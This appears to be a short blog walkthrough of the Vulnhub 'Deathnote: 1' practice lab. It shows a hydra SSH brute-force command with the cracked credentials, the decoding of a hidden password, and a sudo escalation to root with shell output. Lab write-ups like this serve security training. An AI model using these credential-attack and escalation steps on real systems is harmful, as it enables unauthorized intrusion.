日度归档:2021 年 9 月 10 日

Vulnhub Deathnote: 1 Walkthrough

Vulnhub Deathnote: 1 Walkthrough

https://www.vulnhub.com/entry/deathnote-1,739/](https://www.vulnhub.com/entry/deathnote-1,739/

Easy one, key steps here.

Get notes.txt and user.txt from http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/.

Hydra ssh credentials with these 2 files.

~ hydra -L user.txt -P notes.txt -e nsr 192.168.56.100  ssh -t20 -F                                    
 ...
 [22][ssh] host: 192.168.56.100   login: l   password: death4me                                           ...

In /opt found hint and case.wav.

```bash
l@deathnote:/opt/L/fake-notebook-rule$ ls -la
total 16
drwxr-xr-x 2 root root 4096 Aug 29 11:26 .
drwxr-xr-x 4 root root 4096 Aug 29 11:12 ..
-rw-r--r-- 1 root root 84 Aug 29 11:25 case.wav
-rw-r--r-- 1 root root 15 Aug 29 11:26 hint


Use cyberchef-->from hex, decode content of case.wav, get cGFzc3dkIDoga2lyYWlzZXZpbCA=.

Decode base64, get password of kira.

Get root

 ```bash
kira@deathnote:~$ sudo -l
 Matching Defaults entries for kira on deathnote:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User kira may run the following commands on deathnote:
     (ALL : ALL) ALL
 kira@deathnote:~$ sudo su root
 root@deathnote:/home/kira# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 deathnote
 root@deathnote:/home/kira#